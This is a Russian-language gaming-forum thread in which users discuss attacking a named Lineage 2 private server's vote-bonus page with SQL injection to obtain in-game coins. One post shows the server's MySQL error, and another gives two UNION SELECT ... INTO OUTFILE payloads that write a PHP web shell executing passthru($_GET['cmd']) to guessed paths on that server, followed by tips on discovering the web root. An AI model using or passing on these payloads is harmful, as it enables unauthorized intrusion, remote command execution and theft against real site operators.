Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Мысли по поводу приза за голосование...

-

Общение и обсуждение, архив Lineage 2

- Cобытия, информация, вопросы и ответы по Lineage 2

Ответ
 
Опции темы
Старый 13.02.2010, 14:24   #1
 Пехотинец
Аватар для dager315
 
dager315 на правильном путиdager315 на правильном пути
Регистрация: 24.05.2009
Сообщений: 94
Популярность: 152
Сказал(а) спасибо: 183
Поблагодарили 72 раз(а) в 47 сообщениях
Отправить сообщение для dager315 с помощью ICQ
 
Lightbulb Мысли по поводу приза за голосование...

Так как я начал изучать SQL Injection. Меня это наталкнуло на идею... Как через иньекцию получить заветные монетки... Ну что же начну рассказывать суть идеи...

Так как иньекция проводиться не только через адресную строку, но и в других полях ввода... На пример вход в личный кабинет или ввод ника для получения бонуса, я попытался провести мнъекцию... Но в связи не хваткой опыта процес встал в штыки... Для теста я решил использовать некий сервер ... Стрёмненький такой сервачок грация финал... Заходя на страцицу получения бонуса я поочерёдно начал вставлять произвольные не матиматические символы... Так вот после нескольких попыток я ввёл ковычку в конце ника... Вышло сообщение об ошибке синтаксиса...

Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''AxE'' LIMIT 1' at line 1
1

Так же если вставлять ковычку в начало то после неё сервер не читает текст...

Так вот я подумал... Что если вставлять некие команды в в конце ника... Но так как я не знаю не php не mysql а учить их меня ломает, на этом я заступрился... Давайте продвигать тему...
________________
Чё уставился, СПАСИБО жми =))

P.S
КаПаЙ
  Ответить с цитированием
Старый 13.02.2010, 15:23   #2
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: Мысли по поводу приза за голосование...

Цитата:
Сообщение от dager315Посмотреть сообщение
Так как я начал изучать SQL Injection. Меня это наталкнуло на идею... Как через иньекцию получить заветные монетки... Ну что же начну рассказывать суть идеи...

Так как иньекция проводиться не только через адресную строку, но и в других полях ввода... На пример вход в личный кабинет или ввод ника для получения бонуса, я попытался провести мнъекцию... Но в связи не хваткой опыта процес встал в штыки... Для теста я решил использовать некий сервер ... Стрёмненький такой сервачок грация финал... Заходя на страцицу получения бонуса я поочерёдно начал вставлять произвольные не матиматические символы... Так вот после нескольких попыток я ввёл ковычку в конце ника... Вышло сообщение об ошибке синтаксиса...

Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''AxE'' LIMIT 1' at line 1
1

Так же если вставлять ковычку в начало то после неё сервер не читает текст...

Так вот я подумал... Что если вставлять некие команды в в конце ника... Но так как я не знаю не php не mysql а учить их меня ломает, на этом я заступрился... Давайте продвигать тему...

с mysql знаком, что за сервачек для теста, я что нить на нем поэксперементирую и поотписываю в тему.
Таким способом можно провести sql-инжект, но кроме как получения инфы из таблиц я не вижу.
  Ответить с цитированием
Старый 13.02.2010, 15:25   #3
 Пехотинец
Аватар для dager315
 
dager315 на правильном путиdager315 на правильном пути
Регистрация: 24.05.2009
Сообщений: 94
Популярность: 152
Сказал(а) спасибо: 183
Поблагодарили 72 раз(а) в 47 сообщениях
Отправить сообщение для dager315 с помощью ICQ
 
По умолчанию Re: Мысли по поводу приза за голосование...

Сервак l2fl.org...
________________
Чё уставился, СПАСИБО жми =))

P.S
КаПаЙ
  Ответить с цитированием
Старый 13.02.2010, 15:56   #4
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: Мысли по поводу приза за голосование...

помоему тут фильтрация

хотя...

если подобрать путь, можно заюзать это
pirat'union select '<?php passthru($_GET["cmd"]); ?>' into outfile '/httpd/www/html/class.php'#

pirat'union select '<?php passthru($_GET["cmd"]); ?>' into outfile '/l2fl.org/vote/class.php'#

У тебя какие продвижения?

Последний раз редактировалось CeDou; 13.02.2010 в 16:22.
  Ответить с цитированием
Пользователь сказал cпасибо:
dager315 (13.02.2010)
Старый 13.02.2010, 20:00   #5
 Пехотинец
Аватар для dager315
 
dager315 на правильном путиdager315 на правильном пути
Регистрация: 24.05.2009
Сообщений: 94
Популярность: 152
Сказал(а) спасибо: 183
Поблагодарили 72 раз(а) в 47 сообщениях
Отправить сообщение для dager315 с помощью ICQ
 
По умолчанию Re: Мысли по поводу приза за голосование...

Абсольтно никаких... А как обычно подбирают директорию???
________________
Чё уставился, СПАСИБО жми =))

P.S
КаПаЙ
  Ответить с цитированием
Старый 13.02.2010, 20:09   #6
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: Мысли по поводу приза за голосование...

Цитата:
Сообщение от dager315Посмотреть сообщение
Абсольтно никаких... А как обычно подбирают директорию???

можно помучать запросами, тогда само выдаст пути.
но можно и методом подбора,что гораздо неудобнее
  Ответить с цитированием
Старый 13.02.2010, 21:07   #7
 Пехотинец
Аватар для dager315
 
dager315 на правильном путиdager315 на правильном пути
Регистрация: 24.05.2009
Сообщений: 94
Популярность: 152
Сказал(а) спасибо: 183
Поблагодарили 72 раз(а) в 47 сообщениях
Отправить сообщение для dager315 с помощью ICQ
 
По умолчанию Re: Мысли по поводу приза за голосование...

Если так судить то по любому в директории будет стоять папка /skripts/ или /l2top/...
________________
Чё уставился, СПАСИБО жми =))

P.S
КаПаЙ
  Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
По поводу медалей! XxPATRONxX Архив уязвимостей 1 04.12.2009 18:48
[Помогите!] По поводу ВХ. zen Вопросы и ответы: RF Online 9 19.10.2009 17:45
Aion , Саркисян и мои мысли... ZliLO Team of development 10 26.04.2009 11:52
По поводу thunder-pvp riyaz Rising Force Online 7 18.03.2009 17:12

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 10:33.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net